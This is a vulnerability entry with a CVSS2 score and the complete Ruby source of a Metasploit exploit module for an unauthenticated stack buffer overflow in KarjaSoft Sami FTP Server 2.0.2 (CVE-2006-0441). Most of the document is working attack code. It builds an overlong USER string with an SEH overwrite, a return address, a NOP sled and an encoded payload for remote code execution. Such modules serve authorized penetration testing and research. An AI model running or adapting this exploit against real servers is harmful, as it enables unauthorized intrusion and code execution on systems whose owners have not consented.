CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
This module exploits an unauthenticated stack buffer overflow in KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long USER string during login. The payload is triggered when the administrator opens the application GUI. If the GUI window is open at the time of exploitation, the payload will be executed immediately. Keep this in mind when selecting payloads. The application will crash following execution of the payload and will not restart automatically. When the application is restarted, it will re-execute the payload unless the payload has been manually removed from the SamiFTP.binlog log file. This module has been tested successfully on Sami FTP Server versions: 2.0.2 on Windows XP SP0 (x86); 2.0.2 on Windows 7 SP1 (x86); 2.0.2 on Windows 7 SP1 (x64); and 2.0.2 on Windows 10 (1909) (x64).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',
'Description' => %q{
This module exploits an unauthenticated stack buffer overflow in
KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
USER string during login.
The payload is triggered when the administrator opens the application
GUI. If the GUI window is open at the time of exploitation, the
payload will be executed immediately. Keep this in mind when selecting
payloads. The application will crash following execution of the
payload and will not restart automatically.
When the application is restarted, it will re-execute the payload
unless the payload has been manually removed from the SamiFTP.binlog
log file.
This module has been tested successfully on Sami FTP Server versions:
2.0.2 on Windows XP SP0 (x86);
2.0.2 on Windows 7 SP1 (x86);
2.0.2 on Windows 7 SP1 (x64); and
2.0.2 on Windows 10 (1909) (x64).
},
'Author' => [
'Muhammad Ahmed Siddiqui', # Discovery
'Critical Security', # Perl exploit
'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r
'aushack', # Metasploit
'bcoles' # Metasploit
],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
# This vulnerability appears to have been reported multiple times.
['CVE', '2006-0441'],
['CVE', '2006-2212'],
['OSVDB', '25670'],
['BID', '16370'],
['BID', '22045'],
['BID', '17835'],
['EDB', '1448'],
['EDB', '1452'],
['EDB', '1462'],
['EDB', '3127'],
['EDB', '3140'],
['EDB', '40675']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x20\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed
},
'Targets' =>
[
['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll
],
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN ]
},
'DisclosureDate' => '2006-01-24'
)
)
register_options([
Opt::RPORT(21)
])
end
def check
connect
banner = sock.get_once(-1, 3)
disconnect
unless banner.include?('Sami FTP Server')
return CheckCode::Safe('Target is not Sami FTP Server')
end
if banner.include?('Sami FTP Server 2.0.2')
return CheckCode::Appears('Sami FTP Server version 2.0.2.')
end
CheckCode::Detected
end
def exploit
connect
nseh = "\xeb\x06"
nseh << rand_text_alpha(2)
seh = [target.ret].pack('V')
user = rand_text_alpha(596)
user << nseh
user << seh
user << "\x90" * 10
user << payload.encoded
user << "\x90" * (800 - payload.encoded.length)
print_status("Sending payload (#{user.length} bytes) ...")
sock.put("USER #{user}\r\n")
sock.recv(4096)
sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")
sock.recv(4096)
handler
disconnect
end
end